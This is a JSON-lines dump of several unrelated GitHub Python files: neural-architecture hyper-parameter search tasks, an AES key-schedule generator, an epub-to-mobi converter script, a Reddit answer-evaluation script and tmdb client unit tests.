\"\"\"\n :param cls:\n :param logger:\n :param estimator_kwargs:\n :param args: global namespace\n :param index: index of the task\n :return: hpo class, constraints, objectives\n \"\"\"\n\n # hp optimizer\n try:\n hpo = cls._parsed_meta_argument(Register.hpo_self_algorithms, 'cls_hpo_self_algorithm', args, index=index)\n assert issubclass(hpo, AbstractHPO), 'Method must have class methods to optimize the arc'\n except:\n hpo = None\n\n # estimators\n log_headline(logger, 'adding network estimators')\n constraints, objectives = [], []\n for i, e in enumerate(cls._parsed_meta_arguments(Register.hpo_estimators, 'cls_hpo_estimators', args, index=index)):\n estimator = e(args=args, index=i, **estimator_kwargs)\n if estimator.is_constraint():\n constraints.append(estimator)\n if estimator.is_objective():\n objectives.append(estimator)\n logger.info(estimator.str())\n return hpo, constraints, objectives\n\n @classmethod\n def meta_args_to_add(cls, estimator_filter: dict = None, algorithm=True) -> [MetaArgument]:\n estimators = Register.hpo_estimators\n if isinstance(estimator_filter, dict):\n estimators = 
estimators.filter_match_all(**estimator_filter)\n meta = [MetaArgument('cls_hpo_estimators', estimators, help_name='estimator', allow_duplicates=True, allowed_num=(1, -1))]\n if algorithm:\n meta.append(MetaArgument('cls_hpo_self_algorithm', Register.hpo_self_algorithms, help_name='hyper-parameter optimizer', allowed_num=1))\n return meta\n\n @staticmethod\n def mask_architecture_space(args: Namespace, space: ValueSpace) -> ValueSpace:\n _, mask = find_in_args(args, \".mask_indices\")\n for i in split(mask, int):\n space.remove_value(i)\n return space\n\n @staticmethod\n def bench_subspace(args: Namespace, bench: MiniNASTabularBenchmark) -> MiniNASTabularBenchmark:\n _, mask = find_in_args(args, \".mask_indices\")\n masked = [i for i in split(mask, int)]\n return bench.subset(blacklist=masked)\n\n\n@Register.task(search=True)\nclass MiniBenchHPOTask(AbstractTask):\n \"\"\"\n A hyper-parameter optimization task without networks/methods, purely on a given mini-bench\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n super().__init__(args, *args_, **kwargs)\n benchmark_set = self._parsed_meta_argument(Register.benchmark_sets, 'cls_benchmark', args, index=None)\n self.benchmark_set = benchmark_set.from_args(args, index=None)\n self.plot_true_pareto = self._parsed_argument('plot_true_pareto', args)\n\n estimator_kwargs = dict(mini_api=self.benchmark_set)\n self.hpo, self.constraints, self.objectives = SelfHPOUtils.prepare(self, self.logger, estimator_kwargs, args)\n\n @classmethod\n def meta_args_to_add(cls) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True)\n return super().meta_args_to_add() + [\n MetaArgument('cls_benchmark', benchmark_sets, allowed_num=1, help_name='mini benchmark set to optimize on'),\n ] + SelfHPOUtils.meta_args_to_add(algorithm=True, estimator_filter=dict(requires_bench=True))\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('plot_true_pareto', default='False', type=str, help='add the true pareto front', is_bool=True),\n Argument('mask_indices', default=\"\", type=str, help='[int] mask specific primitives from being used'),\n ]\n\n def _run(self):\n file_viz = '%s/%s.pdf' % (self.checkpoint_dir(self.save_dir), self.hpo.__name__)\n space = SelfHPOUtils.bench_subspace(self.args, self.benchmark_set).get_value_space()\n algorithm = self.hpo.run_opt(hparams=self.args, logger=self.logger,\n checkpoint_dir=self.checkpoint_dir(self.save_dir),\n value_space=space,\n constraints=self.constraints, objectives=self.objectives)\n population = algorithm.get_total_population(sort=True)\n population.plot(self.objectives[0].key, self.objectives[1].key, show=False, save_path=file_viz, num_fronts=-1)\n\n if self.plot_true_pareto and not self.hpo.is_full_eval():\n log_headline(self.logger, 'Starting a full evaluation to get the true pareto front')\n full = RandomlyEval(\n value_space=space,\n logger=self.logger,\n save_file='%s/%s.pickle' % (self.checkpoint_dir(self.save_dir), RandomlyEval.__name__),\n constraints=self.constraints,\n objectives=self.objectives,\n num_eval=-1)\n full.search(load=True)\n population.add_other_pareto_to_plot(full.population, self.objectives[0].key, self.objectives[1].key,\n 
show=False, save_path=file_viz)\n return algorithm, population\n\n\n@Register.task(search=True)\nclass NetHPOTask(AbstractNetTask):\n \"\"\"\n An s2 task (trying to figure out the optimal network architecture of a trained s1 network)\n the chosen method contains the exact optimization approach\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n AbstractNetTask.__init__(self, args, *args_, **kwargs)\n\n # args\n self.reset_bn = self._parsed_argument('reset_bn', args)\n self.s1_path = replace_standard_paths(self._parsed_argument('s1_path', args))\n\n # files\n self.tmp_load_path = '%s/checkpoint.tmp.pt' % self.save_dir\n os.makedirs(os.path.dirname(self.tmp_load_path), exist_ok=True)\n shutil.copyfile('%s/data.meta.pt' % self.s1_path, '%s/data.meta.pt' % self.save_dir)\n\n # one method, one trainer... could be executed in parallel in future?\n log_headline(self.logger, 'setting up...')\n self.add_method()\n self.add_trainer(method=self.get_method(), save_dir=self.save_dir, num_devices=-1)\n self.log_detailed()\n self.get_method().get_network().set_forward_strategy(False)\n\n # algorithms\n estimator_kwargs = dict(trainer=self.trainer[0], load_path=self.tmp_load_path)\n self.hpo, self.constraints, self.objectives = SelfHPOUtils.prepare(self, self.logger, estimator_kwargs, args)\n\n # arc space\n space = ValueSpace(*[DiscreteValues.interval(0, n) for n in self.get_method().strategy_manager.get_num_choices(unique=True)])\n self._architecture_space = SelfHPOUtils.mask_architecture_space(self.args, space)\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + common_s2_net_args_to_add()\n\n @classmethod\n def meta_args_to_add(cls, algorithm=True) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n return super().meta_args_to_add() + SelfHPOUtils.meta_args_to_add(algorithm=algorithm, estimator_filter=dict(requires_bench=False))\n\n @classmethod\n def extend_args(cls, args_list: [str]):\n \"\"\"\n allow modifying the arguments list before other classes' arguments are dynamically added\n this should be used sparsely, as it is hard to keep track of\n \"\"\"\n common_s2_extend_args(cls, args_list)\n\n def _run(self, save=True):\n common_s2_prepare_run(self.logger, self.trainer, self.s1_path, self.tmp_load_path, self.reset_bn, self.methods)\n checkpoint_dir = self.checkpoint_dir(self.save_dir)\n candidate_dir = '%s/candidates/' % checkpoint_dir\n file_viz = '%sx.pdf' % checkpoint_dir\n self.get_method().eval()\n\n # run\n algorithm = self.hpo.run_opt(hparams=self.args, logger=self.logger, checkpoint_dir=checkpoint_dir,\n value_space=self._architecture_space,\n constraints=self.constraints, objectives=self.objectives)\n population = algorithm.get_total_population(sort=True)\n\n # save results\n if save:\n population.plot(self.objectives[0].key, self.objectives[1].key, show=False, save_path=file_viz)\n for candidate in population.fronts[0]:\n self.get_method().get_network().forward_strategy(fixed_arc=candidate.values)\n Builder.save_config(self.get_method().get_network().config(finalize=True),\n candidate_dir, 'candidate-%s' % '-'.join([str(g) for g in candidate.values]))\n return algorithm, population\n\n\n@Register.task(search=True)\nclass EvalBenchTask(AbstractTask):\n \"\"\"\n Correlating two or more 
benches with each other\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n AbstractTask.__init__(self, args, *args_, **kwargs)\n\n # benchmarks\n self.same_dataset = self._parsed_argument(\"same_dataset\", args, index=None)\n benchmark_sets = self._parsed_meta_arguments(Register.benchmark_sets, 'cls_benchmarks', args, index=None)\n self.benchmark_sets = [bs.from_args(args, index=i) for i, bs in enumerate(benchmark_sets)]\n\n # correlations\n self.correlation_cls = []\n for name in self._parsed_argument('measure_correlations', self.args, split_=True):\n self.correlation_cls.append(Register.nas_metrics.get(name))\n\n @classmethod\n def meta_args_to_add(cls) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True, tabular=True)\n return super().meta_args_to_add() + [\n MetaArgument('cls_benchmarks', benchmark_sets, allowed_num=(2, -1), allow_duplicates=True,\n help_name='mini benchmark sets to correlate with each other'),\n ] + SelfHPOUtils.meta_args_to_add(algorithm=True, estimator_filter=dict(requires_bench=True))\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('same_dataset', default='False', type=str, is_bool=True,\n help=\"correlate only if the bench results are on the same dataset\"),\n Argument('measure_correlations', default='KendallTauNasMetric', type=str, help='correlations to measure'),\n ]\n\n def _run(self):\n checkpoint_dir = self.checkpoint_dir(self.save_dir)\n file_plot = '%s/plots/%s-%s/%s/%s_%s.pdf' % (checkpoint_dir, '%d', '%d', '%s', '%s', '%s')\n\n # figure out what each bench has\n data_sets = []\n architectures = []\n for bs in self.benchmark_sets:\n assert isinstance(bs, MiniNASTabularBenchmark)\n data_sets.append(set(bs.get_all_datasets()))\n architectures.append(set(bs.get_all_architecture_tuples()))\n\n # plot all set intersections\n for i0 in range(len(self.benchmark_sets)-1):\n for i1 in range(i0+1, len(self.benchmark_sets)):\n log_headline(self.logger, \"correlating i0=%d and i1=%d\" % (i0, i1), target_len=80)\n bench0, bench1 = self.benchmark_sets[i0], self.benchmark_sets[i1]\n\n self.logger.info(\"bench[%d]: %s\" % (i0, bench0.get_name()))\n self.logger.info(\"bench[%d]: %s\" % (i1, bench1.get_name()))\n\n # intersection of evaluated architectures\n arc0, arc1 = architectures[i0], architectures[i1]\n arc = list(arc0.intersection(arc1))\n self.logger.info(\"num architectures: num bench[%d] = %d, num bench[%d] = %d, num intersection = %d\"\n % (i0, len(arc0), i1, len(arc1), len(arc)))\n if len(arc) == 0:\n self.logger.info(\"skipping, can not correlate any architectures\")\n continue\n\n # intersection of evaluated data sets\n ds0, ds1 = data_sets[i0], data_sets[i1]\n ds, used_ds = list(ds0.intersection(ds1)), []\n if self.same_dataset:\n used_ds = [(d, d) for d in ds]\n else:\n for ds0_ in ds0:\n for ds1_ in ds1:\n used_ds.append((ds0_, ds1_))\n self.logger.info(\"data sets: bench[%d] = %s, bench[%d] = %s, intersection = %s, used combinations = %s\"\n % (i0, ds0, i1, ds1, ds, used_ds))\n if len(used_ds) == 0:\n self.logger.info(\"skipping, can not correlate any architectures\")\n continue\n\n # get all relevant results\n results0, results1 = [], []\n for arc_ in arc:\n 
results0.append(bench0.get_by_arch_tuple(arc_))\n results1.append(bench1.get_by_arch_tuple(arc_))\n\n # correlate\n for ds0_, ds1_ in used_ds:\n for key in MiniResult.get_metric_keys():\n name = 'all'\n ds_str = ds0_ if ds0_ == ds1_ else \"%s-%s\" % (ds0_, ds1_)\n\n type0 = self.benchmark_sets[i0].default_result_type\n type1 = self.benchmark_sets[i1].default_result_type\n values0 = [r.get(key, data_set=ds0_, result_type=type0) for r in results0]\n values1 = [r.get(key, data_set=ds1_, result_type=type1) for r in results1]\n\n values0 = np.nan_to_num(values0, nan=-1)\n values1 = np.nan_to_num(values1, nan=-1)\n\n self.correlation_cls[0].plot_correlations(\n values0, values1, self.correlation_cls,\n axes_names=('%s %s' % (bench0.get_name(), type0), '%s %s' % (bench1.get_name(), type1)),\n show=False, save_path=file_plot % (i0, i1, name, key, ds_str))\n\n\n@Register.task(search=True)\nclass EvalNetBenchTask(NetHPOTask):\n \"\"\"\n Evaluate a trained super-network network on a bench\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n super().__init__(args, *args_, **kwargs)\n\n # restrictions\n assert len(self.objectives) == 1\n\n # bench part\n benchmark_set = self._parsed_meta_argument(Register.benchmark_sets, 'cls_benchmark', args, index=None)\n benchmark_set = benchmark_set.from_args(args, index=None)\n self.benchmark_set = SelfHPOUtils.bench_subspace(args, benchmark_set)\n assert isinstance(self.benchmark_set, MiniNASBenchmark)\n self.measure_top = self._parsed_argument('measure_top', self.args)\n # check if the cell architecture was shared during training\n self.num_normal = 1\n _, arc_shared = find_in_args(self.args, '.arc_shared')\n if not arc_shared:\n _, cell_order = find_in_args(self.args, '.cell_order')\n self.num_normal = cell_order.count('n')\n\n # nas metrics\n self.nas_cls = []\n for name in self._parsed_argument('nas_metrics', self.args, split_=True):\n self.nas_cls.append(Register.nas_metrics.get(name))\n\n @classmethod\n def meta_args_to_add(cls, algorithm=True) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True, tabular=True)\n return super().meta_args_to_add(algorithm=algorithm) + [\n MetaArgument('cls_benchmark', benchmark_sets, allowed_num=1, help_name='mini benchmark set to optimize on'),\n ]\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('measure_top', default=500, type=int, help='measure top-N bench architectures'),\n Argument('nas_metrics', default='ImprovementNasMetric, KendallTauNasMetric', type=str, help='metrics to calculate'),\n ]\n\n def _run(self, save=False):\n checkpoint_dir = self.checkpoint_dir(self.save_dir)\n\n # what are the best architectures in a surrogate benchmark...?\n if (self.measure_top > 0) and (not self.benchmark_set.is_tabular()):\n raise NotImplementedError(\"can not measure top-N networks on a non-tabular benchmark\")\n\n # value space, already sorted by best\n sm = StrategyManager()\n svs = [v.arch_tuple for v in self.benchmark_set.get_all_sorted(['acc1'], [True])]\n arc_len = len(svs[0])\n if (self.num_normal > 1) and (len(svs)*self.num_normal == sm.get_num_choices(unique=True)):\n # compensate now for late architecture sharing by duplicating the indices\n 
svs = [tuple(list(v)*self.num_normal) for v in svs]\n self._svs = SpecificValueSpace(svs)\n\n # run\n algorithm, name_num = None, [(str(self.measure_top), self.measure_top), ('random', 9999999999)]\n for name, num in name_num:\n if algorithm is not None:\n algorithm.remove_saved_state()\n\n # tweak self params and let the super class run\n self._architecture_space = deepcopy(self._svs)\n self._architecture_space.specific_values = self._architecture_space.specific_values[:num]\n algorithm, population = super()._run(save=save)\n\n # compare, objective key\n obj_key = self.objectives[0].key\n net_values = []\n bench_values = defaultdict(list)\n for candidate in population.candidates:\n net_values.append(candidate.metrics.get(obj_key))\n r = self.benchmark_set.get_by_arch_tuple(candidate.values[:arc_len])\n for ds in r.get_data_sets():\n bench_values[ds].append(r.get(kind=obj_key, data_set=ds))\n\n # plots, logging\n self.get_method().log_metrics({\n 'net_bench/%s/num' % name: population.size\n })\n for ben_ds, ben_values in bench_values.items():\n for nas_cls in self.nas_cls:\n # calculate metric\n metric_dct = nas_cls.get_data(net_values, ben_values)\n\n # plot\n file_plot = '%s/plots/metrics/%s/%s/%s_%s.pdf' %\\\n (checkpoint_dir, name, ben_ds, obj_key, nas_cls.__name__)\n nas_cls.plot(data=metric_dct, title='', legend=True, show=False, save_path=file_plot)\n\n # log\n for k, v in metric_dct.items():\n self.get_method().log_metric_lists({\n 'net_bench/%s/%s/%s/%s/%s' % (name, ben_ds, obj_key, nas_cls.__name__, k): v\n })\n\n\n@Register.task(search=True)\nclass CreateSearchNetBenchTask(NetHPOTask):\n \"\"\"\n Evaluate a s1 network and create a bench from the results\n this is an intermediate step to compare the prediction of several search network\n \"\"\"\n\n def __init__(self, args: Namespace, *args_, **kwargs):\n super().__init__(args, *args_, **kwargs)\n\n for key in MiniResult.get_metric_keys():\n if not any([o.key == key for o in self.objectives + self.constraints]):\n self.logger.warning('Will not evaluate key \"%s\" on the network (not an objective/constraint)' % key)\n\n self.measure_min = self._parsed_argument('measure_min', args, index=None)\n benchmark_sets = self._parsed_meta_arguments(Register.benchmark_sets, 'cls_benchmarks', args, index=None)\n self.benchmark_sets = [bs.from_args(args, index=i) for i, bs in enumerate(benchmark_sets)]\n for bs in self.benchmark_sets:\n assert isinstance(bs, MiniNASTabularBenchmark)\n\n @classmethod\n def meta_args_to_add(cls, algorithm=True) -> [MetaArgument]:\n \"\"\"\n list meta arguments to add to argparse for when this class is chosen,\n classes specified in meta arguments may have their own respective arguments\n \"\"\"\n benchmark_sets = Register.benchmark_sets.filter_match_all(mini=True, tabular=True)\n return super().meta_args_to_add(algorithm=algorithm) + [\n MetaArgument('cls_benchmarks', benchmark_sets,\n help_name='optional benchmark sets, to evaluate specific architectures'),\n ]\n\n @classmethod\n def args_to_add(cls, index=None) -> [Argument]:\n \"\"\" list arguments to add to argparse when this class (or a child class) is chosen \"\"\"\n return super().args_to_add(index) + [\n Argument('measure_min', default=-1, type=int,\n help='min amount of architectures to generate (but the hpo algorithm may evaluate less)'),\n ]\n\n def _run(self, save=False):\n # value spaces\n values = set()\n sm = StrategyManager()\n\n # add all evaluated architectures of the benchmarks\n for bs in self.benchmark_sets:\n assert isinstance(bs, 
MiniNASTabularBenchmark)\n l0, l1 = len(sm.ordered_names(unique=True)), bs.get_value_space().num_choices()\n assert l0 == l1, \"Num choices of the network space (%d) and the bench space (%d) must match\" % (l0, l1)\n for r in bs.get_all():\n values.add(r.arch_tuple)\n if len(values) > 0:\n self.logger.info(\"Added %d architectures from given benchmark set(s) to the list\" % len(values))\n\n # if the space is smaller than desired, add random architectures\n network = self.get_method().get_network()\n assert isinstance(network, SearchUninasNetwork)\n net_space = sm.get_value_space()\n if self.measure_min > len(values):\n self.logger.info(\"Adding random architectures, have %d/%d\" % (len(values), self.measure_min))\n while len(values) < self.measure_min:\n values.add(net_space.random_sample())\n\n # evaluate the given architectures\n self._architecture_space = SpecificValueSpace(list(values))\n algorithm, population = super()._run(save=save)\n\n # add info to the candidates, e.g. from profilers, such as loss/flops/latency/macs\n pass\n\n # create a new bench\n bench = MiniNASSearchTabularBenchmark.make_from_population(population, self.get_method())\n log_headline(self.logger, \"Created bench file from super-network\")\n bench.print_info(self.logger.info)\n bench.save_in_dir(self.save_dir)\n explore(bench, self.logger, n=10)\n","repo_name":"cogsys-tuebingen/uninas","sub_path":"uninas/tasks/hpo_self.py","file_name":"hpo_self.py","file_ext":"py","file_size_in_byte":25004,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"69876971307","text":"import sys\n# from BitVector import *\nfrom Python.ModGen.mod_gen import mod_gen\n# from AES.gen_table import gen_subbytes_table, gen_inv_subbytes_table\nfrom Utils.utils import *\n\n\n# AES_modulus = BitVector(bitstring = '100011011')\n\nbyte_sub_table = gen_subbytes_table()\n\n\ndef get_round_keys(key: bytes):\n key_words = []\n len1 = len(key)\n num_rounds = None\n if len1 == 16:\n key_words = gen_key_schedule_128(key)\n if len1 == 24:\n key_words = gen_key_schedule_192(key)\n if len1 == 32:\n key_words = gen_key_schedule_256(key)\n key_schedule = []\n for word_index, word in enumerate(key_words):\n keyword_in_ints = []\n for i in range(4):\n keyword_in_ints.append(word[i])\n key_schedule.append(keyword_in_ints)\n return key_schedule\n\n\ndef get_round_keys_verbose(key: bytes):\n key_words = []\n len1 = len(key)\n num_rounds = None\n if len1 == 16:\n key_words = gen_key_schedule_128(key)\n num_rounds = 10\n if len1 == 24:\n key_words = gen_key_schedule_192(key)\n num_rounds = 12\n if len1 == 32:\n key_words = gen_key_schedule_256(key)\n num_rounds = 14\n key_schedule = []\n print(\"\\nEach 32-bit word of the key schedule is shown as a sequence of 4 one-byte integers:\")\n for word_index, word in enumerate(key_words):\n keyword_in_ints = []\n for i in range(4):\n keyword_in_ints.append(word[i])\n if word_index % 4 == 0:\n print(\"\\n\")\n print(\"word %d: %s\" % (word_index, str(keyword_in_ints)))\n key_schedule.append(keyword_in_ints)\n\n round_keys = [None for i in range(num_rounds + 1)]\n for i in range(num_rounds + 1):\n round_keys[i] = (show_hex_2(key_words[i * 4]) + show_hex_2(key_words[i * 4 + 1]) +\n show_hex_2(key_words[i * 4 + 2]) + show_hex_2(key_words[i * 4 + 3]))\n print(\"\\n\\nRound keys in hex (first key for input block):\\n\")\n for round_key in round_keys:\n print(round_key)\n return key_schedule\n\n\ndef gen_key_schedule_128(key):\n key_words = [None for i in range(44)]\n 
round_constant = 0x01\n for i in range(4):\n key_words[i] = key[i * 4: i * 4 + 4]\n for i in range(4, 44):\n if i % 4 == 0:\n kwd, round_constant = gee(key_words[i - 1], round_constant)\n key_words[i] = xor_bytes(key_words[i - 4], bytes(kwd))\n # print(round_constant)\n else:\n key_words[i] = xor_bytes(key_words[i - 4], key_words[i - 1])\n return key_words\n\n\ndef gen_key_schedule_192(key):\n key_words = [None for i in range(52)]\n round_constant = 0x01\n for i in range(6):\n key_words[i] = key[i * 4: i * 4 + 4]\n for i in range(6, 52):\n if i % 6 == 0:\n kwd, round_constant = gee(key_words[i - 1], round_constant)\n key_words[i] = xor_bytes(key_words[i - 6], bytes(kwd))\n else:\n key_words[i] = xor_bytes(key_words[i - 6], key_words[i - 1])\n return key_words\n\n\ndef gen_key_schedule_256(key):\n key_words = [None for i in range(60)]\n round_constant = 0x01\n for i in range(8):\n key_words[i] = key[i * 4: i * 4 + 4]\n for i in range(8, 60):\n if i % 8 == 0:\n kwd, round_constant = gee(key_words[i - 1], round_constant)\n key_words[i] = xor_bytes(key_words[i - 8], bytes(kwd))\n elif (i - (i // 8) * 8) < 4:\n key_words[i] = xor_bytes(key_words[i - 8], key_words[i - 1])\n elif (i - (i // 8) * 8) == 4:\n key_words[i] = []\n for j in range(4):\n key_words[i].append(byte_sub_table[int(key_words[i - 1][j])])\n key_words[i] = xor_bytes(key_words[i - 8], key_words[i])\n elif (i - (i // 8) * 8) > 4 and ((i - (i // 8) * 8) < 8):\n key_words[i] = xor_bytes(key_words[i - 8], key_words[i - 1])\n else:\n sys.exit(\"error in key scheduling algo for i = %d\" % i)\n return key_words\n\n\ndef gee(word, round_constant=0x01):\n rotated_word = rot_word(word)\n new_word = [0x00] * 4\n for i in range(4):\n new_word[i] = byte_sub_table[int(rotated_word[i])]\n new_word[0] ^= round_constant\n round_constant = gf_modular_mul(round_constant, 0x02)\n return new_word, round_constant\n\n\ndef rot_word(word: bytes):\n word2 = bytearray(word)\n w3 = word2.pop(0)\n word2.insert(3, w3)\n return word2\n\n\ndef show_hex_2(data):\n if type(data) == type(b'0'):\n return ''.join([format(data[i], '02x') for i in range(len(data))])\n return format(data, '02x')\n\n\ndef r_con(word):\n \"\"\"\n round Constant\n :param word:\n :return:\n \"\"\"\n\n\ndef set_key(key, keysize=128):\n return key + '0' * (keysize // 8 - len(key)) if len(key) < keysize // 8 else key[:keysize // 8]\n\n\nif __name__ == '__main__':\n key = b'\\x02L\\x1e\\x9e\\xe7\\x13\\x0c\\xac\\xf8j\\xd7\\xbe`\\x87\\xe9\\xd7'\n # get_round_keys(key)\n key2 = 'hello'\n key2 = set_key(key2, 128)\n key3 = bytes(key2, 'ascii')\n k = get_round_keys_verbose(key3)\n k2 = bytes([0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c])\n key4 = int_to_bytes(0x2b7e151628aed2a6abf7158809cf4f3c, 16)\n\n key5 = set_key(key2, 256)\n key6 = bytes(key5, 'ascii')\n k3 = get_round_keys_verbose(key6)\n # for i in range(16):\n # print(key4[i])\n k4 = bytes([0x8e, 0x73, 0xb0, 0xf7, 0xda, 0x0e, 0x64, 0x52, 0xc8, 0x10, 0xf3, 0x2b, 0x80, 0x90, 0x79, 0xe5, 0x62, 0xf8, 0xea, 0xd2, 0x52, 0x2c, 0x6b, 0x7b])\n k6 = bytes([0x60, 0x3d, 0xeb, 0x10, 0x15, 0xca, 0x71, 0xbe, 0x2b, 0x73, 0xae, 0xf0, 0x85, 0x7d, 0x77, 0x81, 0x1f, 0x35, 0x2c, 0x07, 0x3b, 0x61, 0x08, 0xd7, 0x2d, 0x98, 0x10, 0xa3, 0x09, 0x14, 0xdf, 0xf4])\n get_round_keys_verbose(k2)\n get_round_keys_verbose(k4)\n 
get_round_keys_verbose(k6)\n\n\n","repo_name":"DarkPhoenix6/My_Libraries","sub_path":"Python/AES/gen_key_schedule.py","file_name":"gen_key_schedule.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33590461380","text":"from os import listdir, rename\nfrom os.path import isfile, join\nimport subprocess\nfrom tqdm import tqdm\n\n\ndef converter() -> str:\n\n ignored_extensions = ['pdf', 'txt']\n downloaded_epub = \"/Users/jennifersequina/Downloads/\"\n mobi_kindle = downloaded_epub + \"mobi_kindle/\"\n processed_epub = downloaded_epub + \"processed_epub/\"\n\n raw_files = [f for f in listdir(downloaded_epub) if isfile(join(downloaded_epub, f))]\n converted_files = [f for f in listdir(mobi_kindle) if isfile(join(mobi_kindle, f))]\n\n def get_file_extension(f):\n return f.split(\".\")[-1]\n\n def get_final_filename(f):\n f = f.split(\".\")\n filename = \".\".join(f[0:-1])\n processed_file_name = filename + \".mobi\"\n return processed_file_name\n\n for f in tqdm(raw_files):\n final_file_name = get_final_filename(f)\n extension = get_file_extension(f)\n if final_file_name not in converted_files and extension not in ignored_extensions:\n print(\"Converting : \"+f)\n try:\n subprocess.call(['/Applications/calibre.app/Contents/MacOS/ebook-convert', downloaded_epub+f, mobi_kindle+final_file_name])\n rename(downloaded_epub+f, processed_epub+f)\n except Exception as e:\n print(e)\n else:\n print(\"Already exists : \"+final_file_name)\n\n print(\"Kindle Path: \" + str(mobi_kindle+final_file_name))\n return str(mobi_kindle+final_file_name)\n\n","repo_name":"jennifersequina/bookie","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27175744807","text":"from compare_am import get_random_pcp, get_best_response\nfrom general_easyness import lprint, remove_special\n\n\n\ndef get_baseline(n):\n \"\"\" Establishes a baseline through comparing with the most upvoted answer to a\n\n post. 
results can be seen in allreddit_qa.csv\n \"\"\"\n questions = []\n answers = []\n qap = [\"Questions,Top Answers,Chosen Answer Additive, Chosen Answer multiplicative, control score additive, control score multiplicative,reitze score additive,reitze score multiplicative,jochem score additive, jochem score multiplicative\"]\n i = 0\n for pcp in get_random_pcp(n):\n question = remove_special(pcp[0][1])\n post_answers = pcp[1]\n if post_answers == []:\n best_answer = \"\"\n else:\n best_answer = remove_special(post_answers[0][1])\n questions.append(question)\n answers.append(best_answer)\n a_add = get_best_response(question, \"additive\", nposts=1)\n a_mul = get_best_response(question, \"multiplicative\", nposts=1)\n combined = [question, best_answer, a_add, a_mul, str(int(best_answer==a_add)), str(int(best_answer==a_mul)),\"\",\"\",\"\",\"\"]\n qap.append(\",\".join(combined))\n reddit_qa = \"allreddit_qa.csv\"\n f = open(reddit_qa, \"w+\")\n for pair in qap:\n f.write(pair+\"\\n\")\n f.close()\n\n\ndef get_answers_queryfile(filename):\n \"\"\" generates answers to questions from an input file\n\n output for us to judge is in allour_qa.csv\n \"\"\"\n f = open(filename, \"r\")\n w = open(\"allour_qa.csv\", \"w+\")\n w.write(\"Questions,Chosen Answer Additive, Chosen Answer multiplicative, reitze score additive,reitze score multiplicative,jochem score additive, jochem score multiplicative\\n\")\n for line in f.readlines():\n if line[-1] == \"\\n\":\n line = line[:-1]\n question = remove_special(line)\n a_add = get_best_response(question, \"additive\", nposts=10)\n a_mul = get_best_response(question, \"multiplicative\", nposts=10)\n combined = [question, a_add, a_mul, \"\",\"\",\"\",\"\"]\n w.write(\",\".join(combined)+\"\\n\")\n f.close()\n w.close()\n\nfilename = \"our_questions.txt\"\n#get_answers_queryfile(filename)\nget_baseline(100)\n","repo_name":"rlhjansen/LSDP_RedditHelper","sub_path":"test_questions.py","file_name":"test_questions.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70846271789","text":"from unittest.mock import Mock\nimport tmdb_client\nimport json\n\n\ndef test_get_poster_url_uses_default_size():\n # Prepare the data\n poster_api_path = \"some-poster-path\"\n expected_default_size = 'w342'\n # Call the code under test\n poster_url = tmdb_client.get_poster_url(poster_api_path=poster_api_path)\n # Compare the results\n assert expected_default_size in poster_url\n\ndef test_get_movies_list_type_popular():\n movies_list = tmdb_client.get_movies_list(list_name=\"popular\")\n assert movies_list is not None \n\ndef some_function_to_mock():\n raise Exception(\"Original was called\") \n\ndef test_mocking(monkeypatch):\n my_mock = Mock()\n my_mock.return_value = 2\n monkeypatch.setattr(\"tests.test_tmdb.some_function_to_mock\", my_mock)\n result = some_function_to_mock()\n assert result == 2\n\ndef test_get_movies_list(monkeypatch):\n # The list that the mocked \"API request\" will return\n mock_movies_list = ['Movie 1', 'Movie 2']\n\n requests_mock = Mock()\n # The result of the API request call\n response = requests_mock.return_value\n # Mock the result of the .json() method call\n response.json.return_value = mock_movies_list\n monkeypatch.setattr(\"tmdb_client.requests.get\", requests_mock)\n\n movies_list = tmdb_client.get_movies_list(list_name=\"popular\")\n assert movies_list == mock_movies_list \n\ndef test_get_single_movie(monkeypatch):\n mock_single_movie = 'Monkey'\n 
